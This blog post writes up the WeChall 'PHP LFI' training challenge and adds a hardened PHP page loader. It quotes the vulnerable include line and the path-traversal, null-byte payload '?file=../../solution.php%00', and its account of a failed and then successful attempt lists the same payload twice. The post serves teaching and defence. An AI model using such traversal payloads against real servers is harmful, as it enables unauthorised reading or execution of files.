
WeChall_Training: PHP LFI (Exploit, PHP, Training)

Date: 2016-09-08 18:32:38


Your mission is to exploit this code, which has obviously an LFI vulnerability:

GeSHi`ed PHP code
$filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
include $filename;



There is a lot of important stuff in ../solution.php, so please include and execute this file for us.

Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums

For debugging purposes, you may look at the whole source again, also as highlighted version.

 

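Solution:

Because ".html" is appended to the string, I had no idea how to deal with it, so I searched for a write-up and found that %00 can be used to truncate it. I then tried ?file=../../solution.php%00 and found that the file does not exist; after reading the write-up, it turned out to be ?file=../../solution.php%00.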
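The include above trusts $_GET["file"] for both the directory and the file name, which is what the traversal and the %00 truncation rely on. As an added example (not part of the original post or the challenge's code), here is a hardened loader; the pages directory location and the names resolve_page() and PAGES_DIR are assumptions:

```php
<?php
// Added example, not the challenge's code: hardened form of
//   include 'pages/' . $_GET["file"] . '.html';
// Assumptions: pages live in ./pages beside this script and are static
// HTML; resolve_page() and PAGES_DIR are hypothetical names.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

function resolve_page(?string $requested): ?string
{
    $name = $requested ?? 'welcome';

    // 1. Allowlist the page name: no dots, slashes or NUL bytes can pass,
    //    so neither "../" traversal nor "%00" truncation reaches the path.
    if (preg_match('/\A[a-z0-9_-]{1,32}\z/', $name) !== 1) {
        return null;
    }

    // 2. Canonicalise and confirm the result is still inside PAGES_DIR
    //    (defence in depth, e.g. against symlinks placed in the directory).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name . '.html');
    if ($base === false || $path === false) {
        return null; // directory or page does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed inputs: the page's sample names, the payload from the
// write-up as PHP receives it after URL decoding, and a missing parameter.
$samples = ['welcome', 'news', '../../solution.php', "../../solution.php\0", null];
foreach ($samples as $input) {
    $path = resolve_page($input);
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ',
        $path ?? 'rejected', PHP_EOL;
}

// In the request handler, static pages are sent with readfile(), never
// include, so a file that slips through is displayed rather than executed:
// $file = $_GET['file'] ?? null;
// $path = resolve_page(is_string($file) ? $file : null);
// $path === null ? http_response_code(404) : readfile($path);
```

PHP 5.3.4 and later reject paths containing NUL bytes in filesystem functions, so the %00 truncation only works on older interpreters; the checks above do not depend on that.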

 


Original article: http://www.cnblogs.com/zhurb/p/5853831.html
